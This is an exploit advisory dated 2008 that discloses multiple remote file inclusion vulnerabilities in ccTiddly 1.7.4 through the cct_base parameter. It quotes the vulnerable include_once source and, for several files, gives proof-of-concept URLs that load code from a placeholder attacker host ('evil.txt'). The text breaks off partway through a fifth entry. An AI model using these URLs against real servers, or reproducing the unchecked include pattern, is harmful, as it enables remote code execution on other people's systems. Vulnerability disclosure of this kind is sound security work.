1
2 /*
3
4
$Id: cctiddly−1.7.4−rfi.txt,v 0.1 2008/12/04 04:12:20 cOndemned Exp $
5
6
ccTiddly 1.7.4 (cct_base) Multiple Remote File Inclusion Vulnerabilities
7
found by cOndemned
8
9
download from : http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.4.zip
10
11
Probably prior versions are vulnerable too...
12
13
Greetz: ZaBeaTy, str0ke, TBH, Avantura
14
15 */
16
17
18 0x01 :
19
file :
20
/index.php
21
poc :
22
http://[host]/[cctiddly_path]/index.php?cct_base=http://[attacker]/evil.txt?
23
source :
24
25
18.
//includes
26
19.
if(!isset($cct_base))
27
20.
$cct_base = "";
28
21.
29
22.
include_once($cct_base."includes/header.php");
30
23.
include_once($cct_base."includes/login.php");
31
32 0x02 :
33
34
file :
35
/handle/proxy.php
36
poc :
37
http://[host]/[cctiddly_path]/handle/proxy.php?cct_base=http://[attacker]/evil.txt?
38
source :
39
40
3.
if(!isset($cct_base))
41
4.
$cct_base= "../";
42
5.
include_once($cct_base."includes/header.php");
43
6.
include_once($cct_base."includes/config.php");
44
45 0x03 :
46
47
file :
48
/includes/header.php
49
poc :
50
http://[host]/[cctiddly_path]/handle/includes/header.php?cct_base=http://[attacker]/evil.txt?
51
source :
52
Page 1/2
ccTiddly 1.7.4 cct_base Multiple Remote File Inclusion Vulnerabilities
cOndemned
12/04/2008
53
5.
if(!isset($cct_base))
54
6.
$cct_base= "";
55
7.
include_once($cct_base."includes/functions.php");
56
8.
include_once($cct_base."includes/config.php");
57
9.
include_once($cct_base."includes/pluginLoader.php");
58
10.
include_once($cct_base."lang/".$tiddlyCfg[’pref’][’language’]."/language.php");
59
11.
//include is used because language file is included once in config.php file
60
12.
include_once($cct_base."includes/tiddler.php");
61
13.
include_once($cct_base."includes/user.php");
62
63 0x04 :
64
65
file :
66
/includes/include.php
67
poc :
68
http://[host]/[cctiddly_path]/includes/include.php?cct_base=http://[attacker]/evil.txt?
69
source :
70
71
3.
include_once($cct_base."includes/ccAssignments.php");
72
73 0x05 :
74
75
file :
76
/includes/workspace.p